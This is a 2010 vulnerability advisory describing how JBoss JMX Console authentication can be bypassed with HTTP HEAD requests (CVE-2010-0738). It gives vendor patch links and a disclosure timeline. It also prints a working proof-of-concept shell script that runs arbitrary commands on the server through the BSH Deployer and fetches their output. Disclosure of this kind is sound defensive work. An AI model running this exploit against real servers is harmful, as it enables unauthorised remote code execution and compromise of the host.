Follow us on Twitter twitter.jpg
Subscribe to our Newsletter buttons_newsletter.jpg
Visit our YouTube channelĀ buttons_youtube.jpg

MSA030409


JMX Console Authentication Bypass via Verb Tampering

Tested Versions: 
	JMX Console - All Versions

Tested OS: 
	Linux, Solaris, Windows
 		
Minded Security ReferenceID:
	MSA030409
	 

Credits:
        Discovery by 
        Stefano Di Paola of Minded Security 
        stefano.dipaola [_at_] mindedsecurity.com

	Contribution in Exploitation:
	Giorgio Fedon of Minded Security
	giorgio.fedon [_at_] mindedsecurity.com

Reference:
        http://blog.mindedsecurity.com/2010/04/good-bye-critical-jboss-0day.html
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0738

Severity: 
        High: Jmx Console is often exposed to the internet or reachable by abusing 
        other vulnerabilities. This issue can lead to remote host compromise.

Solution:  
        A solution to this issue is already available. 
        See the following RedHat advisories:

        https://rhn.redhat.com/errata/RHSA-2010-0376.html
        https://rhn.redhat.com/errata/RHSA-2010-0377.html
        https://rhn.redhat.com/errata/RHSA-2010-0378.html
        https://rhn.redhat.com/errata/RHSA-2010-0379.html

Summary

Minded Security Consultants discovered during a penetration testing activity that JMX Console authentication can be bypassed. This issue will lead to remote code execution if BSH deployer or other administrative modules are available in the console panel.

Analysis

JMX Console can be secured (protected by password) using the security configuration available in: jboss/server/default/deploy/jmx-console.war/WEB-INF/web.xml This is the suggested security configuration also available in Jboss official security guidelines ("White Paper on JMX Security"): https://jira.jboss.org/jira/browse/SECURITY-31 The suggested configuration for protecting the JMX Console is the following one:
<security-constraint> <web-resource-collection> <web-resource-name>HtmlAdaptor</web-resource-name> <description>An example security config that only allows users with the role JBossAdmin to access the HTML JMX console web application </description> <url-pattern>/*</url-pattern> <http-method>GET</http-method> <http-method>POST</http-method> </web-resource-collection> <auth-constraint> <role-name>JBossAdmin</role-name> </auth-constraint> </security-constraint>
From the configuration above, security restrictions are enabled only for "GET" and "POST" methods. Any other HTTP method supported by the server will be not restricted. By issuing a request with the "HEAD" method is possible to invoke directly, with "JBossAdmin" privilege, any functionality implemented by the jmx-console without valid credentials. Note: If JMX console replies with a HTTP 500 error the request has been correctly processed. The following proof of concept ("jboss-shell.sh") was written by Minded Security consultants to execute arbitrary commands on the remote host through the "BSH Deployer" component of the JMX Console. The command output gets redirected temporarily on JBOSS server status for a couple of seconds. Remote "Jboss-shell.sh" Proof of Concept Note: The following script should be modifies to meet your environment configuration
AA=$1
COM_=`php -r  '$arg=$argv[1];for($i=0;$i<strlen($arg);$i++) {printf("%%%02x",ord($arg[$i]));}echo "\n";' 'import java.io.*;
import java.net.*;
String[] s=new String[] {"/bin/sh","-c","'"$AA"'"}; 
Process p = Runtime.getRuntime().exec(s);
OutputStream os = p.getOutputStream();
InputStream in = p.getInputStream();
DataInputStream dis = new DataInputStream(in);
String e=dis.readLine();
String message=e;
while(e!=null){
  e= dis.readLine();
  message+="|"+e;
}
String mess = message.replaceAll(" ","+").replaceAll("#","%23"); 
URL u = new URL("http://jbossserver:8080/jmx-console/HtmlAdaptor?action=invokeOpByName&name=jboss.deployer%3Aservice%3DBSHDeployer&methodName=createScriptDeployment&argType=java.lang.String&arg0=%54%68%72%65%61%64%2e%73%6c%65%65%70%28%33%30%30%30%29%3b&argType=java.lang.String&arg1=soap&null|"+mess);
HttpURLConnection con = (HttpURLConnection) u.openConnection ();
con.setDoInput(true);
con.setRequestProperty("Cookie","MODIFY ME IF NEEDED");
con.setRequestMethod("HEAD");
con.connect();
con.getResponseMessage();
con.disconnect();'`
HOSTPATH="http://jbossserver:8080"; 
curl -s "$HOSTPATH/jmx-console/HtmlAdaptor?action=invokeOpByName&name=jboss.deployer%3Aservice%3DBSHDeployer&methodName=createScriptDeployment&argType=java.lang.String&arg0=$COM_&argType=java.lang.String&arg1=soap" -g -X HEAD -H "Cookie:MODIFY ME IF NEEDED" &
sleep 1
curl "$HOSTPATH/status?full=true" -s -g -H "Cookie:MODIFY ME IF NEEDED" | grep 'null|.*|null' -o|perl -i -pe 's/\|/\n/g'

Disclosure Timeline

03/04/2009 Issue found 06/03/2010 Reported to Vendor

Disclaimer

The information within this paper may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties with regard to this information. In no event shall the author be liable for any damages whatsoever arising out of or in connection with the use or spread of this information. Any use of this information is at the user's own risk. Permission is hereby granted for the redistribution of this Alert electronically. It is not to be edited in any way without express consent of Minded Security Research Lab. If you wish to reprint the whole or any part of this Alert in any other medium excluding electronic medium, please e-mail research_at_mindedsecurity.com for permission.
Copyright (c) 2010 Minded Security, S.r.l..
All rights reserved worldwide.